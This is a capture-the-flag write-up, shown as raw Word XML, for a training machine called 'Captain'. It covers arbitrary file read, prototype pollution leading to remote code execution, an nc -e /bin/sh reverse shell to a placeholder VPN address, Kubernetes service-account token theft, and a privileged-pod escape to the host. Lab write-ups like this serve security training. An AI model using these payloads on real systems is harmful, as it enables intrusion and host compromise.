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um4szuvq2sz3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vmtddn21cpg5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write-up refers to the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Captain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machine. If you need support, please open a ticket in the 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support channel on the Discord server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spacing w:before="480" w:lineRule="auto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8hemu6m2zmzi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Reconnaissance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Initially, machine enumeration was performed. For this purpose,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used in order to identify which ports were open and which services were exposed in the web application.</w:t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nmap -p- --open --min-rate 1200 &lt;machine-ip&gt; -sVC -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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35100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Through Nmap, ports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22/TCP (SSH)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80/TCP (HTTP)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were identified as open on the target. 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accessing port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80/TCP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the running web application was identified.</w:t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79988"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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9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During navigation through the application, two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main functionalities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were identified.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One of the identified functionalities was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travel booking system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This functionality was intercepted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Burp Suite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allowing analysis of the requests sent by the application’s input.</w:t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94263"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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2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74800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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second functionality identified was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download of a PDF file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containing travel information. This request was also intercepted through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Burp Suite,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allowing detailed analysis.</w:t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097133"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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13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403838"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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83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intercepting this request, a parameter called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file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identified, which referenced the file being read and processed by the web application.</w:t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59000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Since this parameter was not properly sanitized, it became possible to reference internal system files, characterizing an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arbitrary file read vulnerability (File Read)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In this way, it was possible to read internal system files such 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/etc/passwd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336800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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876800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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Similarly, it was also possible to read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files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belonging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web application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itself, such as the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app.js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which contained the entire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source code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of the application.</w:t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120900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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279900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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heading=h.fgab5fubi8r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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.w65bzvmk47w1" w:id="4"/>
      <w:bookmarkEnd w:id="4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Web Application Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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require('express');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bodyParser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require('body-parser');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require('child_process');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require('path');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express();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app.use(bodyParser.json());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app.use(bodyParser.urlencoded({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extended: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app.use(express.static(path.join(__dirname,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'public')));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bookings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isObject(obj)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'object'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merge(target,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(isObject(target[key])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isObject(source[key]))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merge(target[key],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source[key]);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target[key]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source[key];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clone(obj)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merge({},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obj);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constructor(data)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data.name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'Guest';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data.email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data.date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this.passengers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data.passengers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this.tour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data.tour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'standard';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Date.now();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(this.sendEmail)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exec(this.sendEmail);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this.email,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this.date,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passengers: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this.passengers,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tour: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this.tour,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'confirmed'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app.get('/',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(req,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res.sendFile(path.join(__dirname,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'views',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'index.html'));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app.get('/api/download',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(req,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req.query.file;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(!file)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res.status(400).send('File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parameter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absolute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path.resolve('downloads/'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res.download(absolute);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app.get('/api/tours',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(req,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res.json([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'Treasure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Adventure',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hidden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treasure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across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seven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seas!'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'Sunset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Cruise',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'Watch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sunset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sailing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buccaneer!'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'Full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Experience',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249,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adventure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lunch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activities!'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app.post('/api/book',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(req,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bookingData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clone(req.body);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Booking(bookingData);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booking.confirm();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bookings.push(confirmation);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res.json({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booking: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(error)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res.status(500).json({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'Booking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failed'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app.get('/api/bookings',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(req,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res.json(bookings);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app.listen(PORT,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'0.0.0.0',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console.log(`Captain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Jack's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${PORT}`);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this code, a critical vulnerability called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Prototype Pollution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was identified, which allows Remote Code Execution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(RCE) on the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JavaScript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every object inherits properties from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prototype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which functions as a shared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"parent class"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for all objects in the application. This language feature, when poorly implemented, can be exploited.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The merge()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function does not validate special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JavaScript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properties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(__proto__, constructor, prototype),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allowing an attacker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manipulate the global object prototype (Object.prototype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inject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malicious properties that will be inherited by all object instances in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A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merge(target,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(isObject(target[key])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isObject(source[key]))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merge(target[key],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source[key]);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target[key]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source[key];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⚠️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Não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filtra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__proto__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this flaw, it was possible to achieve command execution on the system.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nc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command was used to establish a reverse connection, using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-e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 option to execute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/bin/sh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interpreter after the connection was established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7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"name":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"Pirate",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"email":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"test@test.com",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"2025-01-01",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"__proto__":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"sendEmail":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&lt;vpn-ip&gt;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&lt;port&gt;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13100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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this, a reverse connection to the target was established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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55800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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w7et9kb76koj" w:id="5"/>
      <w:bookmarkEnd w:id="5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Exploitation –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/app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directory, relevant files were found, including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Dockerfile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which indicates that the application is running inside a container, as well as the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flag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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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Upon inspecting the directory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/var/run/secrets/kubernetes.io/serviceaccount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Kubernetes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configuration files were identified, including the authentication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token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and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namespace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associated with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service account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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822700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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fobbd8drv8v8" w:id="6"/>
      <w:bookmarkEnd w:id="6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Privilege Escalation –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these two files, it is possible to verify whether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service account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has sufficient permissions to create or escalate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privileged Pod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within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Kubernetes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cluster.    Next, we exported the authentication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token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and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namespace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associated with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service account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 test the possibility of creating or escalating a privileged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the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA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TOKEN=$(cat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/var/run/secrets/kubernetes.io/serviceaccount/token)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NAMESPACE=$(cat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/var/run/secrets/kubernetes.io/serviceaccount/namespace)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781675" cy="600075"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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60007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create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Kubernetes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configuration file (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kubeconfig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 is required, used by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kubectl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tool. The file was downloaded to the machine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curl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-LO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"https://dl.k8s.io/release/$(curl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https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"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52500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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file named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pod.yaml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created to deploy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privileged Pod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This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runs as the root user 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privileged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mode, allowing direct access to host system resources and consequently breaking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Kubernetes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’ default isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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'EOF'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pod.yaml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apiVersion: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vert-root-pod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namespace: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restartPolicy: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imagePullPolicy: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runAsUser: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runAsGroup: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privileged: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command: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["/bin/sh"]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args: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["-c",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"sleep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infinity"]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volumeMounts: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mountPath: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/mnt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volumes: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hostPath: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152900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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kubectl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we created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./kubectl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--server=https://kubernetes.default.svc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--token="$TOKEN"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--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt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pod.yaml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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Next, an interactive shell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(/bin/sh)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obtained inside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default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namespace, authenticating through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cluster’s ServiceAccoun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 token, allowing command execution directly within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container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kubectl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--server=https://kubernetes.default.svc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--token="$TOKEN"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--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt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vert-root-pod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/bin/sh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04900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Since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is running 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privileged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mode, it was possible to mount the host’s root directory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(/)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inside the container, obtaining unrestricted access to the host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operating system files and completely compromising Kubernetes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isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C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df -h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command, all system partitions were listed. From this information, we identified the partition corresponding to the host root directory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(/),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in this case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/dev/root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which was mounted inside the container, allowing access to the host system files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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06600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Next, the partitions were mounted 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/tmp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directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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/dev/root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/tmp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381500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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this, we gained access to all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host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system files, including the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/root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directory, where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was located.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16100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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sectPr>
      <w:headerReference r:id="rId33" w:type="default"/>
      <w:headerReference r:id="rId34" w:type="first"/>
      <w:headerReference r:id="rId35" w:type="even"/>
      <w:footerReference r:id="rId36" w:type="default"/>
      <w:footerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38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2">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18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|All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                         Page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C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D">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.erybp8ewxga1" w:id="7"/>
    <w:bookmarkEnd w:id="7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-866769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115" name="image24.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image24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1E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F">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2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7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-942969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112" name="image21.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image21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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3025204"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="8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Captain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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3025204"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="89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96075" cy="302520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7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6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId27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9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines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image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId1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4.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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KktK4FL2uw9Ps39Q9qcVKQKU6g==">CgMxLjAyDmgudW00c3p1dnEyc3ozMg5oLnZtdGRkbjIxY3BnNTIOaC44aGVtdTZtMnptemkyDmguZmdhYjVmdWJpOHJyMg5oLnc2NWJ6dm1rNDd3MTIOaC53N2V0OWtiNzZrb2oyDmguZm9iYmQ4ZHJ2OHY4Mg5oLmVyeWJwOGV3eGdhMTgAciExZzBvSG5ETEFhTzBPRW1xUVdiWlhPTC1kZUFxV3BwTzU=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